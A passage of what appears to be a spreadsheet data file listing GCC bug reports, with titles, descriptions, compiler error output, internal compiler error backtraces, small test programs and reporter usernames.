I suspect the problem is alpha specific because other people don't seem to
have troubles from make check in glibc but this is just a wild uneducated
guess... -)</t>
  </si>
  <si>
    <t>GCC-44448</t>
  </si>
  <si>
    <t>32-bit gfortran.dg/atan2_1.f90 fails on Solaris 1[01]/x86 at -O0</t>
  </si>
  <si>
    <t>The last remaining gfortran testsuite failure on Solaris 10/11 x86 is
FAIL: gfortran.dg/atan2_1.f90  -O0  execution test
(only for 32-bit).  The test aborts at l.12:
do i = 1 10
  if(atan(1.0  i/10.0)  -atan2(1.0  i/10.)    /= 0.0)   call abort()
  if(atan(1.0d0i/10.0d0)-atan2(1.0d0i/10.0d0) /= 0.0d0) call abort()
end do
at the first if for i=1.  This is very strange since I've verified that
atan2f is called both times with identical args.  I'm uncertain how to proceed
from here and don't know how to investigate the i387 floating point registers
in gdb.</t>
  </si>
  <si>
    <t>GCC-48508</t>
  </si>
  <si>
    <t>ICE in output_die at dwarf2out.c:11409</t>
  </si>
  <si>
    <t>/abuild/jh/trunk-install/bin/g++ -flto=25   ~/jsatom.ii ~/jscntxt.ii ~/jsgc.ii ~/jsinterp.ii ~/jsinvoke.ii ~/jsiter.ii  -r -nostdlib  -g -O3
leads eventually to
lto1: internal compiler error: in output_die at dwarf2out.c:11409
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
It seems that all the files are needed to reproduce the ICE.</t>
  </si>
  <si>
    <t>GCC-16283</t>
  </si>
  <si>
    <t>[4.0 regression] ICE subst_stack_regs_pat at reg-stack.c:1638 at gcc -O2</t>
  </si>
  <si>
    <t>gcc version 3.5.0 20040626 (experimental)
i686-pc-mingw32
Windows XP SP1 Professional
current Cygwin 1.5.10
binutils 2.15.91 20040628
mingwrt head
w32api head
libiconv 1.9.1
gmake 3.80
Configured with: ../../src/cvs/mainline/gcc/configure --
prefix=/aaronwl/cs/env/mingw-head-head-head --enable-checking --enable-
maintainer-mode --with-included-gettext --with-libiconv-
prefix=/aaronwl/cs/internat/iconv/install
gcc -O2 -c sf_erf.c causes the ICE
../../src/cvs/runtime/mingwex/math/sf_erf.c: In function `erfcf':
../../src/cvs/runtime/mingwex/math/sf_erf.c:264: internal compiler error: in 
subst_stack_regs_pat at reg-stack.c:1638
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Testcase is sf_erf.c attachment following.</t>
  </si>
  <si>
    <t>GCC-55398</t>
  </si>
  <si>
    <t>[4.8 Regression] va_arg usage with non-POD</t>
  </si>
  <si>
    <t>The r193595 causes both Apple clang 4.1 and llvm 3.2 clang svn to fail to bootstrap gcc trunk with the failure...
clang++ -c   -g -DIN_GCC   -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../gcc-4.8-20121119/gcc -I../../gcc-4.8-20121119/gcc/. -I../../gcc-4.8-20121119/gcc/../include -I../../gcc-4.8-20121119/gcc/../libcpp/include -I/sw/include -I/sw/include  -I../../gcc-4.8-20121119/gcc/../libdecnumber -I../../gcc-4.8-20121119/gcc/../libdecnumber/dpd -I../libdecnumber -I../../gcc-4.8-20121119/gcc/../libbacktrace -DCLOOG_INT_GMP -I/sw/include -I/sw/include -I/sw/include ../../gcc-4.8-20121119/gcc/tree-data-ref.c -o tree-data-ref.o
clang: warning: treating 'c' input as 'c++' when in C++ mode this behavior is deprecated
../../gcc-4.8-20121119/gcc/tree-data-ref.c:1599:31: error: second argument to 'va_arg' is of non-POD type 'affine_fn' (aka 'vec') [-Wnon-pod-varargs]
    ret-&gt;fns[i] = va_arg (ap affine_fn)
                  ~~~~~~~~~~~~^~~~~~~~~~
/usr/bin/../lib/clang/4.1/include/stdarg.h:35:50: note: expanded from macro 'va_arg'
#define va_arg(ap type)    __builtin_va_arg(ap type)
                                                 ^
../../gcc-4.8-20121119/gcc/tree-data-ref.c:1665:34: error: cannot pass object of non-POD type 'affine_fn' (aka 'vec') through variadic function call will abort at runtime [-Wnon-pod-varargs]
          *overlaps_a = conflict_fn (1 affine_fn_cst (integer_zero_node))
                                        ^
../../gcc-4.8-20121119/gcc/tree-data-ref.c:1666:34: error: cannot pass object of non-POD type 'affine_fn' (aka 'vec') through variadic function call will abort at runtime [-Wnon-pod-varargs]
          *overlaps_b = conflict_fn (1 affine_fn_cst (integer_zero_node))
                                        ^
../../gcc-4.8-20121119/gcc/tree-data-ref.c:1812:37: error: cannot pass object of non-POD type 'affine_fn' (aka 'vec') through variadic function call will abort at runtime [-Wnon-pod-varargs]
      *overlaps_a = conflict_fn (1 affine_fn_cst (integer_zero_node))
                                    ^
../../gcc-4.8-20121119/gcc/tree-data-ref.c:1813:37: error: cannot pass object of non-POD type 'affine_fn' (aka 'vec') through variadic function call will abort at runtime [-Wnon-pod-varargs]
      *overlaps_b = conflict_fn (1 affine_fn_cst (integer_zero_node))
                                    ^
../../gcc-4.8-20121119/gcc/tree-data-ref.c:1858:39: error: cannot pass object of non-POD type 'affine_fn' (aka 'vec') through variadic function call will abort at runtime [-Wnon-pod-varargs]
                      *overlaps_a = conflict_fn (1 affine_fn_cst (integer_zero_node))
                                                    ^
../../gcc-4.8-20121119/gcc/tree-data-ref.c:1862:39: error: cannot pass object of non-POD type 'affine_fn' (aka 'vec') through variadic function call will abort at runtime [-Wnon-pod-varargs]
                      *overlaps_b = conflict_fn (1 affine_fn_cst (tmp))
                                                    ^
../../gcc-4.8-20121119/gcc/tree-data-ref.c:1938:39: error: cannot pass object of non-POD type 'affine_fn' (aka 'vec') through variadic function call will abort at runtime [-Wnon-pod-varargs]
                      *overlaps_a = conflict_fn (1 affine_fn_cst (integer_zero_node))
                                                    ^
../../gcc-4.8-20121119/gcc/tree-data-ref.c:1941:39: error: cannot pass object of non-POD type 'affine_fn' (aka 'vec') through variadic function call will abort at runtime [-Wnon-pod-varargs]
                      *overlaps_b = conflict_fn (1 affine_fn_cst (tmp))
                                                    ^
../../gcc-4.8-20121119/gcc/tree-data-ref.c:2203:37: error: cannot pass object of non-POD type 'affine_fn' (aka 'vec') through variadic function call will abort at runtime [-Wnon-pod-varargs]
      *overlaps_a = conflict_fn (2 ova1 ova2)
                                    ^
../../gcc-4.8-20121119/gcc/tree-data-ref.c:2203:43: error: cannot pass object of non-POD type 'affine_fn' (aka 'vec') through variadic function call will abort at runtime [-Wnon-pod-varargs]
      *overlaps_a = conflict_fn (2 ova1 ova2)
                                          ^
../../gcc-4.8-20121119/gcc/tree-data-ref.c:2204:37: error: cannot pass object of non-POD type 'affine_fn' (aka 'vec') through variadic function call will abort at runtime [-Wnon-pod-varargs]
      *overlaps_b = conflict_fn (1 ovb)
                                    ^
../../gcc-4.8-20121119/gcc/tree-data-ref.c:2208:37: error: cannot pass object of non-POD type 'affine_fn' (aka 'vec') through variadic function call will abort at runtime [-Wnon-pod-varargs]
      *overlaps_a = conflict_fn (1 affine_fn_cst (integer_zero_node))
                                    ^
../../gcc-4.8-20121119/gcc/tree-data-ref.c:2209:37: error: cannot pass object of non-POD type 'affine_fn' (aka 'vec') through variadic function call will abort at runtime [-Wnon-pod-varargs]
      *overlaps_b = conflict_fn (1 affine_fn_cst (integer_zero_node))
                                    ^
../../gcc-4.8-20121119/gcc/tree-data-ref.c:2404:37: error: cannot pass object of non-POD type 'affine_fn' (aka 'vec') through variadic function call will abort at runtime [-Wnon-pod-varargs]
      *overlaps_a = conflict_fn (1 affine_fn_cst (integer_zero_node))
                                    ^
../../gcc-4.8-20121119/gcc/tree-data-ref.c:2405:37: error: cannot pass object of non-POD type 'affine_fn' (aka 'vec') through variadic function call will abort at runtime [-Wnon-pod-varargs]
      *overlaps_b = conflict_fn (1 affine_fn_cst (integer_zero_node))
                                    ^
../../gcc-4.8-20121119/gcc/tree-data-ref.c:2462:34: error: cannot pass object of non-POD type 'affine_fn' (aka 'vec') through variadic function call will abort at runtime [-Wnon-pod-varargs]
          *overlaps_a = conflict_fn (1 ova)
                                        ^
../../gcc-4.8-20121119/gcc/tree-data-ref.c:2463:34: error: cannot pass object of non-POD type 'affine_fn' (aka 'vec') through variadic function call will abort at runtime [-Wnon-pod-varargs]
          *overlaps_b = conflict_fn (1 ovb)
                                        ^
../../gcc-4.8-20121119/gcc/tree-data-ref.c:2604:11: error: cannot pass object of non-POD type 'affine_fn' (aka 'vec') through variadic function call will abort at runtime [-Wnon-pod-varargs]
                               affine_fn_univar (build_int_cst (NULL_TREE x1)
                               ^
fatal error: too many errors emitted stopping now [-ferror-limit=]
20 errors generated.
make[3]: *** [tree-data-ref.o] Error 1
make[2]: *** [all-stage1-gcc] Error 2
make[1]: *** [stage1-bubble] Error 2
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>GCC-36919</t>
  </si>
  <si>
    <t>[4.4 regression] Bootstrap failure on IRIX 6.5: unrecognizable insn in errors.c</t>
  </si>
  <si>
    <t>As of 20080724 mainline fails to bootstrap on IRIX 6.5:
/vol/gccsrc/obj/gcc-4.4.0-20080724/6.5-gcc/./prev-gcc/xgcc -B/vol/gccsrc/obj/gcc-4.4.0-20080724/6.5-gcc/./prev-gcc/ -B/vol/gcc/mips-sgi-irix6.5/bin/ -c  -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wcast-qual -Wold-style-definition -Wc++-compat -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros 				     -Wno-overlength-strings -Werror -fno-common  -DHAVE_CONFIG_H -DGENERATOR_FILE -I. -Ibuild -I/vol/gcc/src/gcc-dist/gcc -I/vol/gcc/src/gcc-dist/gcc/build -I/vol/gcc/src/gcc-dist/gcc/../include -I/vol/gcc/src/gcc-dist/gcc/../libcpp/include -I/vol/gcc/include -I/vol/gcc/include -I/vol/gcc/src/gcc-dist/gcc/../libdecnumber -I/vol/gcc/src/gcc-dist/gcc/../libdecnumber/dpd -I../libdecnumber  -o build/errors.o /vol/gcc/src/gcc-dist/gcc/errors.c
/vol/gcc/src/gcc-dist/gcc/errors.c: In function 'trim_filename':
/vol/gcc/src/gcc-dist/gcc/errors.c:124: error: unrecognizable insn:
(insn 154 139 49 /vol/gcc/src/gcc-dist/gcc/errors.c:116 (sequence [
            (jump_insn 43 139 45 /vol/gcc/src/gcc-dist/gcc/errors.c:116 (set (pc
)
                    (if_then_else (ne (reg:SI 3 $3 [235])
                            (reg:SI 2 $2 [236]))
                        (label_ref:SI 90)
                        (pc))) 423 {*branch_equalitysi} (expr_list:REG_BR_PRED (const_int 49 [0x31])
                    (expr_list:REG_DEAD (reg:SI 3 $3 [235])
                        (expr_list:REG_DEAD (reg:SI 2 $2 [236])
                            (expr_list:REG_EQUAL (if_then_else (ne (reg:SI 3 $3 [235])
                                        (const_int 47 [0x2f]))
                                    (label_ref:SI 90)
                                    (pc))
                                (expr_list:REG_BR_PROB (const_int 300 [0x12c])
                                    (nil)))))))
            (insn 45 43 49 (set (reg/v/f:SI 5 $5 [orig:231 p ] [231])
                    (reg/v/f:SI 4 $4 [orig:234 name ] [234])) 252 {*movsi_internal} (nil))
        ]) -1 (nil))
/vol/gcc/src/gcc-dist/gcc/errors.c:124: internal compiler error: in num_delay_slots at config/mips/mips.md:863
I've last bootstrapped successfully on 20080613.</t>
  </si>
  <si>
    <t>GCC-1478</t>
  </si>
  <si>
    <t>_Jv_PrepareCompiledClass throws exception</t>
  </si>
  <si>
    <t>_Jv_PrepareCompiledClass throws an exception.
However it also expects to be called with the
class mutex held.  See Class::initializeClass for
an example.  These two things are contradictory.
Release:
current cvs</t>
  </si>
  <si>
    <t>GCC-66110</t>
  </si>
  <si>
    <t>uint8_t memory access not optimized</t>
  </si>
  <si>
    <t>It appears that gcc does not do a good job of optimizing memory accesses to 'uint8_t' variables.  In particular it appears as if strict aliasing is not done on uint8_t variables and it appears it is not done even if the uint8_t is in a struct.
============ GCC version:
$ ~/src/install-5.1.0/bin/gcc -v
Using built-in specs.
COLLECT_GCC=/home/kevin/src/install-5.1.0/bin/gcc
COLLECT_LTO_WRAPPER=/home/kevin/src/install-5.1.0/libexec/gcc/x86_64-unknown-linux-gnu/5.1.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-5.1.0/configure --prefix=/home/kevin/src/install-5.1.0 --enable-languages=c
Thread model: posix
gcc version 5.1.0 (GCC) 
=========== Compile command line:
~/src/install-5.1.0/bin/gcc -v -save-temps -O2 -Wall u8alias.c -c
=========== Contents of u8alias.c:
typedef __UINT8_TYPE__ uint8_t
typedef __UINT16_TYPE__ uint16_t
struct s1 {
    uint16_t f1
    uint8_t f2
}
struct s2 {
    struct s1 *p1
}
void f1(struct s2 *p)
{
    p-&gt;p1-&gt;f2 = 9
    p-&gt;p1-&gt;f2 = 10
}
=========== Contents of u8alias.i:
# 1 u8alias.c
# 1 
# 1 
# 1 /usr/include/stdc-predef.h 1 3 4
# 1  2
# 1 u8alias.c
typedef unsigned char uint8_t
typedef short unsigned int uint16_t
struct s1 {
    uint16_t f1
    uint8_t f2
}
struct s2 {
    struct s1 *p1
}
void f1(struct s2 *p)
{
    p-&gt;p1-&gt;f2 = 9
    p-&gt;p1-&gt;f2 = 10
}
=========== Results of compilation:
$ objdump -ldr u8alias.o
0000000000000000 :
f1():
   0:   48 8b 07                mov    (%rdi)%rax
   3:   c6 40 02 09             movb   $0x90x2(%rax)
   7:   48 8b 07                mov    (%rdi)%rax
   a:   c6 40 02 0a             movb   $0xa0x2(%rax)
   e:   c3                      retq   
=========== Expected results:
I expected the second redundant load to be eliminated - for example clang produces this assembler (after replacing the gcc specific uint8_t typedefs with an include of ):
$ clang -Wall -O2 u8alias.c -c
$ objdump -ldr u8alias.o
0000000000000000 :
f1():
   0:   48 8b 07                mov    (%rdi)%rax
   3:   c6 40 02 0a             movb   $0xa0x2(%rax)
   7:   c3                      retq   
=========== Other notes:
If the code is changed so that there are two redundant writes to -&gt;f1 then gcc does properly optimize away the first store.  Also if the above definition of f2 is changed to an 8-bit bitfield (ie uint8_t f2 : 8) then gcc does properly optimize away the first store.
This occurs on other platforms besides x86_64.  (In particular it happens on avr-gcc where 8-bit integers are very common.)  I reproduced the above on gcc 5.1.0 but I've also seen it on variants of gcc 4.8 and gcc 4.9.
My guess is that the above is the result of an interpretation of the C99 specification - in particular section 6.5:
  An object shall have its stored value accessed only by an lvalue expression that has one of the following types:
[...]
      -- a character type.
However I do not think that should apply to the above test case for either of the two following reasons:
1 - the memory access was not to a character type it was to an integer type that happened to be 1 byte in size (ie a uint8_t type)
2 - the memory access was not to a character type it was to a member of 'struct s1'.
As noted above clang (eg 3.4.2) does perform the expected optimization.</t>
  </si>
  <si>
    <t>GCC-24207</t>
  </si>
  <si>
    <t>PRIVATE/PUBLIC attribute confusion screws NAMELIST</t>
  </si>
  <si>
    <t>The best description comes from an email by Richard Maine.
http://gcc.gnu.org/ml/fortran/2005-10/msg00073.html
Consider the following code:
  module a
   implicit none
   real b
  end module a
  module c
   use a
   implicit none
   private
   contains
      subroutine d
         namelist /e/ b
         read(5e)
      end subroutine d
  end module c
The PRIVATE keyword in MODULE C does not effect the PUBLIC attribute of
b that is available via the USE a statement.
Note Lahey's website says the above is conforming code.</t>
  </si>
  <si>
    <t>GCC-32583</t>
  </si>
  <si>
    <t>[4.3 Regression] Endless recursion in PRE phi translation</t>
  </si>
  <si>
    <t>GCC-9784</t>
  </si>
  <si>
    <t>gcc 3.2.2 bootstrap on AIX 5.2 fails with GCC 2.9 as compiler</t>
  </si>
  <si>
    <t>In directory /usr/local/gcc-obj/gcc
Command:
./xgcc -B./ -B/usr/local/powerpc-ibm-aix5.2.0.0/bin/ -isystem 
/usr/local/powerpc-ibm-aix5.2.0.0/include -isystem 
/usr/local/powerpc-ibm-aix5.2.0.0/sys-include -O2  
-DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes 
-Wmissing-prototypes -isystem ./include   -g -DHAVE_GTHR_DEFAULT 
-DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED  -I. -I. -I../../gcc-3.2.2/gcc 
-I../../gcc-3.2.2/gcc/. -I../../gcc-3.2.2/gcc/config 
-I../../gcc-3.2.2/gcc/../include  -DL_fixunsdfsi 
-c ../../gcc-3.2.2/gcc/libgcc2.c -o libgcc/./_fixunsdfsi.o
Output:
../../gcc-3.2.2/gcc/libgcc2.c: In function `__fixunsdfsi':
../../gcc-3.2.2/gcc/libgcc2.c:1174: unrecognizable insn:
(insn 13 12 14 (set (reg:CCEQ 119)
        (compare:CCEQ (ior:SI (gt:SI (reg:CCFP 118)
                    (const_int 0 [0x0]))
                (eq:SI (reg:CCFP 118)
                    (const_int 0 [0x0])))
            (const_int 1 [0x1]))) -1 (insn_list 12 (nil))
    (expr_list:REG_DEAD (reg:CCFP 118)
        (nil)))
../../gcc-3.2.2/gcc/libgcc2.c:1174: Internal compiler error in extract_insn at recog.c:2148
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [libgcc/./_fixunsdfsi.o] Error 1
make[3]: Leaving directory `/usr/local/gcc-obj/gcc'
make[2]: *** [stmp-multilib] Error 2
make[2]: Leaving directory `/usr/local/gcc-obj/gcc'
make[1]: *** [stage1_build] Error 2
make[1]: Leaving directory `/usr/local/gcc-obj/gcc'
make: *** [bootstrap] Error 2
# ./xgcc -v
Using built-in specs.
Configured with: ../gcc-3.2.2/configure 
Thread model: aix
gcc version 3.2.2
GCC Used to make xgcc
# gcc -v
Reading specs from /usr/bin/../lib/gcc-lib/powerpc-ibm-aix5.1.0.0/2.9-aix51-020209/specs
gcc version 2.9-aix51-020209
Release:
gcc-3.2.2
Environment:
IBM AIX 5.2 on SMP PowerPC_POWER3 CPU.  64 bit kernel installed.
gcc 2.9 is a 32bit executable.
Using GNU Make version 3.79.1</t>
  </si>
  <si>
    <t>bkhiatt</t>
  </si>
  <si>
    <t>GCC-41703</t>
  </si>
  <si>
    <t>Problems with SFINAE. Source works at gcc 3.4.6 but fails at 4.2.1 and 4.5.0.20091008</t>
  </si>
  <si>
    <t>Hello! I have FreeBSD 8.0-BETA4.
Why this
#include 
template 
class TSizeEnabler { public: typedef T TClass }
template  unsigned int GetAllSize(const X &amp;Var)
   { return sizeof(Var) }
template  unsigned int GetAllSize(const typename TSizeEnabler::TClass &amp;Var)
   { return Var.CalcMySize() }
template 
class THash
   {
      public:
      T Var
      unsigned int CalcMySize() const { return 42 + GetAllSize(Var) }
   }
int main()
   {
      int a
      THash b
      std::cout (a) &lt;&lt; std::endl
      std::cout  &gt;(b) &lt;&lt; std::endl
      return 0
   }
works well at gcc 3.4.6 but fails at gcc 4.2.1 and gcc 4.5.0.20091008 with these messages:
gcc 4.5.0.2009100 output:
%g++45 -std=c++0x main.cpp
main.cpp: In function 'int main()':
main.cpp:24:46: error: call of overloaded 'GetAllSize(THash&amp;)' is ambiguous
main.cpp:6:36: note: candidates are: unsigned int GetAllSize(const X&amp;) [with X = THash]
main.cpp:8:36: note: unsigned int GetAllSize(const typename TSizeEnabler::TClass&amp;) [with X = THash typename TSizeEnabler::TClass = THash]
%
And gcc 4.2.1 output:
%g++ main.cpp
main.cpp: In function 'int main()':
main.cpp:23: error: call of overloaded 'GetAllSize(THash&amp;)' is ambiguous
main.cpp:5: note: candidates are: unsigned int GetAllSize(const X&amp;) [with X = THash]
main.cpp:7: note:                 unsigned int GetAllSize(const typename TSizeEnabler::TClass&amp;) [with X = THash]
%
And how i can fix it the problem?
Thanks.</t>
  </si>
  <si>
    <t>DimanNe</t>
  </si>
  <si>
    <t>GCC-7907</t>
  </si>
  <si>
    <t>Exception thrown from one shared object does not get caught in a different shared object</t>
  </si>
  <si>
    <t>If you throw an exception from one shared object and try to catch it from another one it does not get caught.
This bug appeared also in version 2.95.3 was fixed in version 3.0.x and somehow was reinserted to version 3.2
Release:
unknown
Environment:
Linux using mandrake 8.2 with gcc3.2
How-To-Repeat:
Throw an exception from one shared object and attempt to catch it from another shared object.</t>
  </si>
  <si>
    <t>dickman</t>
  </si>
  <si>
    <t>GCC-798</t>
  </si>
  <si>
    <t>wrong templated operator lookup in custom namespace</t>
  </si>
  <si>
    <t>The following program should return exit code 0 but returns 1 instead.
This is apparently caused by an error in operator == lookup.
The second friend defined one should be applied but conversion to int takes 
place instead and the built in operator == is called.
Note that the problem disappears by removing either the namespace
or the first friend operator == definition.
The problem has been recently discussed on comp.lang.c++.moderated
under the subject Is this a gcc bug?. Here is the code:
namespace A {
template  class Nil {
    public:
        operator T () const { return T() }
        friend bool operator == (const Nil &amp; lhs const Nil &amp; rhs) {
			return true
        }
        friend bool operator == (const Nil &amp; lhs const T &amp; rhs) {
			return true
        }
}
}
using namespace A
int main(int argc char* argv[]) {
    int i = 5
    Nil b
	return b == i ? 0 : 1
}
Release:
GNU C++ version 2.95.2-3 19991024
Environment:
Reading specs from /usr/lib/gcc-lib/i686-pc-cygwin/2.95.2-3/specs
gcc driver version 2.95.2-3 19991024 (cygwin experimental) executing gcc version 2.95.2
GNU CPP version 2.95.2-3 19991024 (cygwin experimental) (80386 BSD syntax)
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc-lib/i686-pc-cygwin/2.95.2-3/../../../../include/g++-3
 /usr/lib/gcc-lib/i686-pc-cygwin/2.95.2-3/../../../../include
 /usr/include
 /usr/lib/gcc-lib/i686-pc-cygwin/2.95.2-3/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
End of omitted list.
 /usr/lib/gcc-lib/i686-pc-cygwin/2.95.2-3/cc1plus.exe Lookup.ii -quiet -dumpbase Lookup.cc -version -o Lookup.s
GNU C++ version 2.95.2-3 19991024 (cygwin experimental) (i686-pc-cygwin) compiled by GNU C version 2.95.2 19991024 (release-2).
 as -o Lookup.o Lookup.s
 /usr/lib/gcc-lib/i686-pc-cygwin/2.95.2-3/collect2.exe -Bdynamic /usr/lib/crt0.o -L/usr/lib/gcc-lib/i686-pc-cygwin/2.95.2-3 Lookup.o -lgcc -lcygwin -luser32 -lkernel32 -ladvapi32 -lshell32 -lgcc
How-To-Repeat:
Compile run the program and check the returned value.
It should be 0 but is 1 instead.</t>
  </si>
  <si>
    <t>nicola.musatti</t>
  </si>
  <si>
    <t>GCC-57751</t>
  </si>
  <si>
    <t>[4.7/4.8/4.9 Regression] ICE in cxx_eval_indirect_ref at cp/semantics.c:7648</t>
  </si>
  <si>
    <t>Trying to compile code of this pattern
  extern unsigned long ADDR   
  unsigned long f(){
    const unsigned long* const var=(unsigned long*)(
    const unsigned long retval=var[1]
    return retval
  }
with gcc 4.8.1 like this
  g++ -c gcc-4.8.1-crash.cpp
we get the following internal error:
gcc-4.8.1-crash.cpp: In function 'long unsigned int f()':
gcc-4.8.1-crash.cpp:5:35: internal compiler error: in cxx_eval_indirect_ref at cp/semantics.c:7648
   const unsigned long retval=var[1]
                                   ^
0x5bf32f cxx_eval_indirect_ref
        ../../gcc/cp/semantics.c:7647
0x5bf32f cxx_eval_constant_expression
        ../../gcc/cp/semantics.c:7884
0x5bd9e1 cxx_eval_constant_expression
        ../../gcc/cp/semantics.c:8065
0x5bfbf6 cxx_eval_outermost_constant_expr
        ../../gcc/cp/semantics.c:8136
0x5c0ef8 maybe_constant_init(tree_node*)
        ../../gcc/cp/semantics.c:8264
0x545107 store_init_value(tree_node* tree_node* vec** int)
        ../../gcc/cp/typeck2.c:714
0x5125d5 check_initializer
        ../../gcc/cp/decl.c:5728
0x520475 cp_finish_decl(tree_node* tree_node* bool tree_node* int)
        ../../gcc/cp/decl.c:6347
0x580b03 cp_parser_init_declarator
        ../../gcc/cp/parser.c:16142
0x58130e cp_parser_simple_declaration
        ../../gcc/cp/parser.c:10670
0x582e10 cp_parser_block_declaration
        ../../gcc/cp/parser.c:10551
0x583e30 cp_parser_declaration_statement
        ../../gcc/cp/parser.c:10195
0x570177 cp_parser_statement
        ../../gcc/cp/parser.c:8966
0x57139e cp_parser_statement_seq_opt
        ../../gcc/cp/parser.c:9238
0x5714be cp_parser_compound_statement
        ../../gcc/cp/parser.c:9192
0x57f638 cp_parser_function_body
        ../../gcc/cp/parser.c:17827
0x57f638 cp_parser_ctor_initializer_opt_and_function_body
        ../../gcc/cp/parser.c:17863
0x58036f cp_parser_function_definition_after_declarator
        ../../gcc/cp/parser.c:21843
0x580f83 cp_parser_function_definition_from_specifiers_and_declarator
        ../../gcc/cp/parser.c:21764
0x580f83 cp_parser_init_declarator
        ../../gcc/cp/parser.c:15922
This doesn't happen when compiling as C or using older gcc (confirmed for 4.5.1 at least).</t>
  </si>
  <si>
    <t>jan.kiszka</t>
  </si>
  <si>
    <t>GCC-69022</t>
  </si>
  <si>
    <t>attribute vector_size ignored with dependent bytes</t>
  </si>
  <si>
    <t>While working on a fix for bug 58109 (and bug 69020) I came across another instance of attribute vector_size not being handled correctly (in addition to bug 35758 and bug 38260).  In the following test case the attribute is accepted on all declarations except that of c.  As in bug 58109 the problem in this case also seems to be in the is_late_template_attribute() function which fails to treat the argument as dependent.
$ cat x.cpp &amp;&amp; /build/gcc-trunk-svn/gcc/xg++ -B /build/gcc-trunk-svn/gcc -S -Wall -Wextra -Wpedantic -o/dev/null x.cpp 
template 
struct A { static const int X = N }
#define ASSERT(e) static_assert (e #e)
template 
struct B: A
{
    using A::X
    static void foo ()
    {
        char a __attribute__ ((vector_size (N)))
        ASSERT (sizeof a == N)
        T b __attribute__ ((vector_size (N)))
        ASSERT (sizeof b == N)
    }
    static void bar ()
    {
        char c __attribute__ ((vector_size (X)))
        ASSERT (sizeof c == X)
        T d __attribute__ ((vector_size (X)))
        ASSERT (sizeof d == X)
    }
}
void bar ()
{
    B::foo ()
    B::bar ()
}
x.cpp: In static member function â€˜static void B::bar()â€™:
x.cpp:22:48: warning: â€˜vector_sizeâ€™ attribute ignored [-Wattributes]
         char c __attribute__ ((vector_size (X)))
                                                ^
x.cpp: In instantiation of â€˜static void B::bar() [with T = int int N = 16]â€™:
x.cpp:33:17:   required from here
x.cpp:4:19: error: static assertion failed: sizeof c == X
 #define ASSERT(e) static_assert (e #e)
                   ^
x.cpp:23:9: note: in expansion of macro â€˜ASSERTâ€™
         ASSERT (sizeof c == X)
         ^~~~~~</t>
  </si>
  <si>
    <t>GCC-68286</t>
  </si>
  <si>
    <t>[6 Regression] ICE: in wide_int_to_tree at tree.c:1468</t>
  </si>
  <si>
    <t>trippels@gcc2-power8 libopus % cat bands.i
int a b c
int fn1() {
  int d[] = {0}
  for ( c c++) {
    float e = c
    if (e)
      d[0]++
  }
  b = d[0]
  return a
}
trippels@gcc2-power8 libopus % gcc -O3 -c bands.i
bands.i: In function â€˜fn1â€™:
bands.i:2:5: internal compiler error: in wide_int_to_tree at tree.c:1468
 int fn1() {
     ^
0x10b4dc33 wide_int_to_tree(tree_node* generic_wide_int &gt; const&amp;)
        ../../gcc/gcc/tree.c:1468
0x10446a9f make_tree(tree_node* rtx_def*)
        ../../gcc/gcc/expmed.c:5128
0x10baaa0b force_const_mem(machine_mode rtx_def*)
        ../../gcc/gcc/varasm.c:3707
0x10dc3ad3 gen_movv4si(rtx_def* rtx_def*)
        ../../gcc/gcc/config/rs6000/vector.md:107
0x1045e1a7 insn_gen_fn::operator()(rtx_def* rtx_def*) const
        ../../gcc/gcc/recog.h:301
0x1045e1a7 emit_move_ccmode
        ../../gcc/gcc/expr.c:3352
0x1045e1a7 emit_move_insn_1(rtx_def* rtx_def*)
        ../../gcc/gcc/expr.c:3509
0x1045e60f emit_move_insn(rtx_def* rtx_def*)
        ../../gcc/gcc/expr.c:3585
0x1047137f expand_expr_real_2(separate_ops* rtx_def* machine_mode expand_modifier)
        ../../gcc/gcc/expr.c:9073
0x1045a80f expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def** bool)
        ../../gcc/gcc/expr.c:9583
0x104570a3 expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def** bool)
        ../../gcc/gcc/expr.c:10647
0x1045a08b expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def** bool)
        ../../gcc/gcc/expr.c:9588
0x10465f9f expand_expr
        ../../gcc/gcc/expr.h:256
0x10465f9f expand_operands(tree_node* tree_node* rtx_def* rtx_def** rtx_def** expand_modifier)
        ../../gcc/gcc/expr.c:7550
0x1046f50b expand_expr_real_2(separate_ops* rtx_def* machine_mode expand_modifier)
        ../../gcc/gcc/expr.c:9374
0x10303857 expand_gimple_stmt_1
        ../../gcc/gcc/cfgexpand.c:3613
0x10303857 expand_gimple_stmt
        ../../gcc/gcc/cfgexpand.c:3673
0x103069b3 expand_gimple_basic_block
        ../../gcc/gcc/cfgexpand.c:5679
0x1030cf27 execute
        ../../gcc/gcc/cfgexpand.c:6291</t>
  </si>
  <si>
    <t>GCC-9984</t>
  </si>
  <si>
    <t>ICE with -gdwarf-2 -feliminate-dwarf2-dups</t>
  </si>
  <si>
    <t>When compiled with gcc -gdwarf-2 -feliminate-dwarf2-dups
The following program generates iternal compiler error:
-------------------------------------------------
g++ test.i -gdwarf-2 -feliminate-dwarf2-dups
/home/linux/ref_2003-03-04_16.28/tpt/lib/gcc-lib/i686-pc-linux-gnu/3.2.2/../../../../include/c++/3.2.2/streambuf:131: Internal
   compiler error in build_abbrev_table at dwarf2out.c:5770
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
------------------------
#include 
main()
{
  std::cout &lt;&lt; Hello World!  &lt;&lt; std::endl
}
Release:
unknown
How-To-Repeat:
gzip -d testi.gz
gcc -gdwarf-2 -feliminate-dwarf2-dups test.i</t>
  </si>
  <si>
    <t>deegan</t>
  </si>
  <si>
